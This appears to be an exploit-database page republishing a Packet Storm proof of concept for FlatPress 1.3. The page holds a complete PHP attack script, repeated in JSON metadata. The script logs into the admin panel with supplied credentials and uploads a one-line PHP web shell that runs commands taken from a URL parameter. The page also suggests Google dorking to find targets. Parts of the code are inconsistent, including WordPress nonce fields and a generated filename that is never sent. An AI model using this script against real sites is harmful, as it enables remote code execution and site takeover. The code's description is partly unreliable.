📄 FlatPress 1.3 Shell Upload_PACKETSTORM:212775

Description

FlatPress version 1.3 remote shell upload proof of concept exploit that leverages a cross site request forgery vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212775

Published Dec 12, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : FlatPress 1.3 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

(Related : https://packetstorm.news/files/id/178208/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: script.php <base_url> <username> <password>

[+] PayLoad :

<?php
function random_string($length = 5) {
// إنشاء سلسلة عشوائية
$letters = 'abcdefghijklmnopqrstuvwxyz';
return substr(str_shuffle($letters), 0, $length);
}

function login_and_upload($base_url, $username, $password) {
$filename = random_string() . ".php";
$login_url = "http://{$base_url}/login.php";
$upload_url = "http://{$base_url}/admin.php?p=uploader&action=default";

// إنشاء جلسة cURL جديدة
$ch = curl_init();

// إعداد خيارات cURL للدخول
$login_data = [
'user' => $username,
'pass' => $password,
'submit' => 'Login'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));

// تنفيذ الطلب
$response = curl_exec($ch);

if (strpos($response, 'Logout') !== false) {
echo "Login Successful!\n";
} else {
echo "Login Failed!\n";
echo $response;
return;
}

// تحميل الملف
echo "Shell uploading...\n";

// إعداد بيانات الفورم لرفع الملف
$files = [
'upload[]' => new CURLFile('php://memory', 'text/php', '<?php echo `$_GET[0]`; ?>')
];
$form_data = [
'_wpnonce' => '9e0ed04260',
'_wp_http_referer' => '/admin.php?p=uploader',
'upload' => 'Upload'
];

curl_setopt($ch, CURLOPT_URL, $upload_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($form_data, $files));

// تنفيذ طلب رفع الملف
$response = curl_exec($ch);

if (strpos($response, 'File(s) uploaded') !== false || strpos($response, 'Upload') !== false) {
$shell_url = "http://{$base_url}/fp-content/attachs/{$filename}";
echo "Your Shell is Ready: {$shell_url}\n";
echo "Shell Usage: {$shell_url}?0=command\n";
} else {
echo "Exploit Failed!\n";
echo $response;
}

// إغلاق جلسة cURL
curl_close($ch);
}

// مثال استخدام
if ($argc != 4) {
echo "Usage: script.php <base_url> <username> <password>\n";
} else {
list($script, $base_url, $username, $password) = $argv;
login_and_upload($base_url, $username, $password);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-12T17:14:30",
    "description": "FlatPress version 1.3 remote shell upload proof of concept exploit that leverages a cross site request forgery vulnerability...",
    "published": "2025-12-12T00:00:00",
    "modified": "2025-12-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 FlatPress 1.3 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212775",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : FlatPress 1.3 shell upload Vulnerability                                                                                    |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://github.com/flatpressblog/flatpress/archive/1.3.zip                                                                  |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.\n    \n       (Related : https://packetstorm.news/files/id/178208/ Related CVE numbers:  ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Usage: script.php <base_url> <username> <password>\n    \n    [+] PayLoad :\n    \n    <?php\n    function random_string($length = 5) {\n        // \u0625\u0646\u0634\u0627\u0621 \u0633\u0644\u0633\u0644\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629\n        $letters = 'abcdefghijklmnopqrstuvwxyz';\n        return substr(str_shuffle($letters), 0, $length);\n    }\n    \n    function login_and_upload($base_url, $username, $password) {\n        $filename = random_string() . \".php\";\n        $login_url = \"http://{$base_url}/login.php\";\n        $upload_url = \"http://{$base_url}/admin.php?p=uploader&action=default\";\n    \n        // \u0625\u0646\u0634\u0627\u0621 \u062c\u0644\u0633\u0629 cURL \u062c\u062f\u064a\u062f\u0629\n        $ch = curl_init();\n    \n        // \u0625\u0639\u062f\u0627\u062f \u062e\u064a\u0627\u0631\u0627\u062a cURL \u0644\u0644\u062f\u062e\u0648\u0644\n        $login_data = [\n            'user' => $username,\n            'pass' => $password,\n            'submit' => 'Login'\n        ];\n    \n        curl_setopt($ch, CURLOPT_URL, $login_url);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n        curl_setopt($ch, CURLOPT_POST, 1);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));\n    \n        // \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0637\u0644\u0628\n        $response = curl_exec($ch);\n    \n        if (strpos($response, 'Logout') !== false) {\n            echo \"Login Successful!\\n\";\n        } else {\n            echo \"Login Failed!\\n\";\n            echo $response;\n            return;\n        }\n    \n        // \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0645\u0644\u0641\n        echo \"Shell uploading...\\n\";\n    \n        // \u0625\u0639\u062f\u0627\u062f \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0641\u0648\u0631\u0645 \u0644\u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641\n        $files = [\n            'upload[]' => new CURLFile('php://memory', 'text/php', '<?php echo `$_GET[0]`; ?>')\n        ];\n        $form_data = [\n            '_wpnonce' => '9e0ed04260',\n            '_wp_http_referer' => '/admin.php?p=uploader',\n            'upload' => 'Upload'\n        ];\n    \n        curl_setopt($ch, CURLOPT_URL, $upload_url);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($form_data, $files));\n    \n        // \u062a\u0646\u0641\u064a\u0630 \u0637\u0644\u0628 \u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641\n        $response = curl_exec($ch);\n    \n        if (strpos($response, 'File(s) uploaded') !== false || strpos($response, 'Upload') !== false) {\n            $shell_url = \"http://{$base_url}/fp-content/attachs/{$filename}\";\n            echo \"Your Shell is Ready: {$shell_url}\\n\";\n            echo \"Shell Usage: {$shell_url}?0=command\\n\";\n        } else {\n            echo \"Exploit Failed!\\n\";\n            echo $response;\n        }\n    \n        // \u0625\u063a\u0644\u0627\u0642 \u062c\u0644\u0633\u0629 cURL\n        curl_close($ch);\n    }\n    \n    // \u0645\u062b\u0627\u0644 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\n    if ($argc != 4) {\n        echo \"Usage: script.php <base_url> <username> <password>\\n\";\n    } else {\n        list($script, $base_url, $username, $password) = $argv;\n        login_and_upload($base_url, $username, $password);\n    }\n    ?>\n    \n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212775",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212775/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply